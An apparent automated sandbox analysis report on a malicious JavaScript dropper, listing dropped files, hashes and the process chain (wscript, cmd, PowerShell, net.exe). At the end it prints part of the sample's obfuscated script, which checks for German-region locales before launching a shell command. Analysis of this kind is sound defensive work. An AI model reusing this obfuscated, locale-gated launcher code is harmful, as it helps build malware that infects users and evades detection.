C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.247976552619112 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXlUcpgioVYGnZiQ0Y3qoAvJfshHHrPeUkwRe9:YvXKXO/PVYGcmZGUUUkee9 |
MD5: | 31BEA21D6F160AFDB921ABE128854027 |
SHA1: | 195DDD2F9926C9A90996537F4F531DF0A18E9191 |
SHA-256: | A723F14533F8B237C0C686590FAF043DADA12F14CB57191364FA189B243559A9 |
SHA-512: | E189AA1ACE137290D2810AB7CC00B353406AAEB123C625ADF809B4638B880FA42E23CBDD4DB84304F870CEFFF99F86DC780EDA032AE9D6A6D6C8BD929855EC3E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.259010416802845 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXlUcpgioVYGnZiQ0Y3qoAvJTqgFCrPeUkwRe9:YvXKXO/PVYGcmZGTq16Ukee9 |
MD5: | B4FC59DD38FECD6CF1C865D660C8B295 |
SHA1: | 83299DDD04EDA7650E4549474AF745C557FAA693 |
SHA-256: | 1468949D0BF645DBD6F4C3070BBB96F439BA90DE431E806A9356DDA6C9BE0C28 |
SHA-512: | A3B9707399C5F46385E3679E6674F9D5837D84EE2A9C465A370C971099C638ADA5348AE93BC5472E15A6E003D85F3DCECD851A2FC3114C12ED14CD6A5564AD2C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.147011271000775 |
Encrypted: | false |
SSDEEP: | 24:YvtDWaA5gaycsZQ04AJYq/pBHvm2sCjA1j0SSsm2SNK2LSMCboR28pfr55wd96hA:YvYEDplJPA5qbKO3R283+d96y |
MD5: | 5F30703A977C67901544BE8AF4253018 |
SHA1: | 534E456917A449BFF75DA3608A830A40113F8E03 |
SHA-256: | 191304AA4F90AC7DF4466DF50615135008AE88A444052376047722D3854A59AB |
SHA-512: | E1193A1920E1BFAFDCBE378EC11B9C5B64BACBDBE1A2D806A6C2923F4E2C661BD5A708A1169B2EB83A7010E9A5945EBA949D030AAA85B0E29963FA7CC047E817 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1457216370065195 |
Encrypted: | false |
SSDEEP: | 24:TLhx/XYKQvGJF7urs74+RZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudV:TFl2GL7ms3Xc+XcGNFlRYIX2v3kW |
MD5: | 7258DF924C3D08CFDD7900EC84B3A417 |
SHA1: | 28DCF5DEDEECB47B382B041375CCFD47ABA8D018 |
SHA-256: | A6C12103BB78D736909B20CA689A692C0E63BC45ACEEEC57EF66DC4C55A87E74 |
SHA-512: | BA60E85C347A8E12D1EBD8DF82DDD9BEE27FDC3746E71593D763B8A8691EFDCF91B69871C79DD42754DEEB4DD4D6E0C5CE356C71B83B8779EEBA699AD6F77798 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.5516682558374553 |
Encrypted: | false |
SSDEEP: | 24:7+tYy4+UXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxtfqLxx/4:7MQXc+XcGNFlRYIX2v4fqVl2GL7msm |
MD5: | E3B00E012090A0CE232444A366A0B75D |
SHA1: | 87DAD612A80337DC0A639183636CB4C3A52BD9B7 |
SHA-256: | 344DF29767AEC79B66B360C6943C333B1020A146CA606921DCB952D7A8BF8CA3 |
SHA-512: | AB2A91A147AD7A416916DA7242BDF0869160C8E3A4240621AC041FCD360BDCAC4946D6B664C37CD64F702FA4E54B277AA1EA59D08B63C2122E599C05AE5C777A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEg9+dOm0gPPPAoTlZuRoIKwLRQhNO3Yyu:6a6TZ44ADEAd9PPh5ZuRsO3K |
MD5: | 2912B1DDC249B8FEEE59FF813A93EAA1 |
SHA1: | 3044B73BB34993773B6115749A7F712465AC8662 |
SHA-256: | 17FAEC49E257D7E271E71FFD4D9C77423E7DF5F15EC00125AF36D25E095C83AD |
SHA-512: | 0E82177E32BAC254D9B8EE9587962BEE9A38325786F89E198EB40E924741EB0B4BE849429C3FC284AD2E2C5ACF506C9864D10BCA5E0FCF6B35E3289B4E73B26D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulJnp/p:NllU |
MD5: | BC6DB77EB243BF62DC31267706650173 |
SHA1: | 9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF |
SHA-256: | 5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27 |
SHA-512: | 91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.4967695053263634 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClEVGKw:Qw946cPbiOxDlbYnuRK+bDV7w |
MD5: | 841407F3F9942B8D4CFE4E426F57CA8E |
SHA1: | 1104A6EA163645D52CAD1FBBE92BEEBD2D9CA030 |
SHA-256: | 230B31031A53CACA278D0466E2AA707E0730EB82EAEBD3EE4F00D246246C3836 |
SHA-512: | CFD0A5F85A7D01D2280C394445954D68162B41DB20034A74E309B05B8AF173B0086C1B37AACF8E64A4FE3E9331EE706FB4B6259D6E437C900FF17D74AB145661 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 11-57-13-035.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.338264912747007 |
Encrypted: | false |
SSDEEP: | 384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb |
MD5: | 128A51060103D95314048C2F32A15C66 |
SHA1: | EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB |
SHA-256: | 601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713 |
SHA-512: | 55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15112 |
Entropy (8bit): | 5.3390706088426505 |
Encrypted: | false |
SSDEEP: | 384:jGk/8qxvvYVXQCRamBOnSAMaGJ8bEcQulWucK6Yy24wJ1yty05SccFc19jbBYNGU:nFF |
MD5: | BB9106F4BC2B94DDF0CD4464C1757713 |
SHA1: | 07E2CB177B7AAE98C12D07DA3177BFA882E2C32C |
SHA-256: | 5C225E967547C3AA1FDF20BB372AA68D262A5B363BA658F3C149E7E34AD78B12 |
SHA-512: | F1CA51A1D55D8A2BEA48579E95EF75E00947A94D0D2C8213382B1EE74BFB67B7CDC7A92AD5AEC1B91F948758F6F59340E675BEC2652736A3E686A3080C16193B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.400337305249219 |
Encrypted: | false |
SSDEEP: | 192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcb4vBB9MNytvC2nPcbQIN7cbZ:V3fOCIdJDeW2N4 |
MD5: | 0DE4517ED460239407ECE7B01364362D |
SHA1: | 67B899121E273B7DDC34AF1EA854488C3A225388 |
SHA-256: | 35953328796FFD4C6CC0859B103C426E56CCA2C51021A6CABB69B17B5CBFA776 |
SHA-512: | FEF3591D593CCF762AC34ABF8B72BC0772511E7310117091D8F44007634A9C07485148E35B76BE9D45769BCB211A0F947601C42FD9C5117874E57EA5CF548D8A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje |
MD5: | 716C2C392DCD15C95BBD760EEBABFCD0 |
SHA1: | 4B4CE9C6AED6A7F809236B2DAFA9987CA886E603 |
SHA-256: | DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8 |
SHA-512: | E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xaWL07oXGZGwYIGNPJwdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JaWLxXGZGwZGM3mlind9i4ufFXpAXkru |
MD5: | 0A347312E361322436D1AF1D5145D2AB |
SHA1: | 1D6C06A274705F8A295F62AD90CF8CA27555C226 |
SHA-256: | 094501B3CA4E93F626ABFCAE800645C533B61409DC3D1D233F4D053CE6A124D7 |
SHA-512: | 9856C231513B47DD996488DF19EEE44DBB320E55432984C0C041EF568B6EC5C05F5340831132890D1D162E0505CA243D579582EDB9157CF722A86EC8CE2FEAFE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.915548370816532 |
TrID: | |
File name: | 21646213161445014123.js |
File size: | 17'885 bytes |
MD5: | 5dcdbc7348a9ed406239777820782d6c |
SHA1: | 7f21fecf095643c071391d43e4197d13909f549a |
SHA256: | c4b53aa7f33126524f4063db2d3142bd170c953888ae2ce5f4a1dd34245a41b1 |
SHA512: | 31d8ee362f59483f32f9331160664ec90665178570d0dec27b14079e5ac316670d13a14de77881862171278fd4e9389353dece09dee8823d5e404bfab964c35a |
SSDEEP: | 384:WBlU0ND07SHzqnpGawf0AeO4a0rw60z/Vxirjxb:WBlvNDwSHzraWQw60z/VxirjN |
TLSH: | 868203DD5000178ACCC126F0109998F92294D0EE9FEC98D99AB165FF9C175B2A2EC7F7 |
File Content Preview: | function cymwbu(){swcuhco=[1031,3079,5127,4103,2055,3072];var kxzoa=this[oothclktd+jibsnrniv+cjyxr+rlyfvd+ijyocrp+eanrf+zeypvjoc+tmcnxcmn](this[jybei+nqvxxrior+vgeicyij+cjyxr+sxstn+oothclktd+tmcnxcmn][kigtdgdk+cjyxr+ijyocrp+jibsnrniv+tmcnxcmn+ijyocrp+hydy |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 11:57:04 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6fc4c0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 11:57:05 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff60a200000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 11:57:05 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 11:57:05 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 11:57:09 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff651090000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 11:57:09 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff60a200000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 11:57:09 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff608610000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 11:57:10 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 11:57:10 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7403e0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 11:57:10 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function cymwbu() { |
|
1 | swcuhco = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var kxzoa = this[oothclktd + jibsnrniv + cjyxr + rlyfvd + ijyocrp + eanrf + zeypvjoc + tmcnxcmn] ( this[jybei + nqvxxrior + vgeicyij + cjyxr + sxstn + oothclktd + tmcnxcmn][kigtdgdk + cjyxr + ijyocrp + jibsnrniv + tmcnxcmn + ijyocrp + hydyychb + jhxreo + ctguf + ijyocrp + vgeicyij + tmcnxcmn] ( jybei + nqvxxrior + vgeicyij + cjyxr + sxstn + oothclktd + tmcnxcmn + xjlnqb + nqvxxrior + oxovk + ijyocrp + fgekkckhu + fgekkckhu ) [gksrzrwrz + ijyocrp + dixmflm + gksrzrwrz + ijyocrp + jibsnrniv + ihqqb] ( gjrdtfitk + dbcfuc + ketrumk + onvyp + brxjuxlya + kigtdgdk + frnzwfdg + gksrzrwrz + gksrzrwrz + ketrumk + aonjf + jqkdwo + brxjuxlya + frnzwfdg + nqvxxrior + ketrumk + gksrzrwrz + mljpuoyfe + kigtdgdk + beqxcd + zeypvjoc + tmcnxcmn + cjyxr + beqxcd + fgekkckhu + jqydj + fdwbbl + jibsnrniv + zeypvjoc + ijyocrp + fgekkckhu + mljpuoyfe + eanrf + zeypvjoc + tmcnxcmn + ijyocrp + cjyxr + zeypvjoc + jibsnrniv + tmcnxcmn + sxstn + beqxcd + zeypvjoc + jibsnrniv + fgekkckhu + mljpuoyfe + nsnsop + beqxcd + vgeicyij + jibsnrniv + fgekkckhu + ijyocrp ), 16 ); |
|
3 | for ( xwzohme = 0 ; xwzohme < swcuhco[fgekkckhu + ijyocrp + zeypvjoc + dixmflm + tmcnxcmn + oxovk] ; ++ xwzohme ) | |
4 | { | |
5 | if ( kxzoa == swcuhco[xwzohme] ) | |
6 | { | |
7 | kxzoa = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( kxzoa !== true ) | |
12 | this[jybei + nqvxxrior + vgeicyij + cjyxr + sxstn + oothclktd + tmcnxcmn][vpydvxcb + tpuaikxj + sxstn + tmcnxcmn] ( ); | |
13 | this[jybei + nqvxxrior + vgeicyij + cjyxr + sxstn + oothclktd + tmcnxcmn][kigtdgdk + cjyxr + ijyocrp + jibsnrniv + tmcnxcmn + ijyocrp + hydyychb + jhxreo + ctguf + ijyocrp + vgeicyij + tmcnxcmn] ( jybei + nqvxxrior + vgeicyij + cjyxr + sxstn + oothclktd + tmcnxcmn + xjlnqb + nqvxxrior + oxovk + ijyocrp + fgekkckhu + fgekkckhu ) [cjyxr + tpuaikxj + zeypvjoc] ( vgeicyij + blciodyds + ihqqb + jqydj + necpj + vgeicyij + jqydj + oothclktd + beqxcd + tbhuiygje + ijyocrp + cjyxr + rlyfvd + oxovk + ijyocrp + fgekkckhu + fgekkckhu + xjlnqb + ijyocrp + qujxai + ijyocrp + jqydj + vpbjzcgeu + kigtdgdk + beqxcd + blciodyds + blciodyds + jibsnrniv + zeypvjoc + ihqqb + jqydj + iyxtpik + eanrf + zeypvjoc + yemsji + beqxcd + sceltlaoj + ijyocrp + vpbjzcgeu + jybei + ijyocrp + jhxreo + gksrzrwrz + ijyocrp + eqefsi + tpuaikxj + ijyocrp + rlyfvd + tmcnxcmn + jqydj + vpbjzcgeu + hydyychb + tpuaikxj + tmcnxcmn + xaizcy + sxstn + fgekkckhu + ijyocrp + jqydj + owbwgo + tmcnxcmn + ijyocrp + blciodyds + oothclktd + owbwgo + mljpuoyfe + sxstn + zeypvjoc + yemsji + beqxcd + sxstn + vgeicyij + 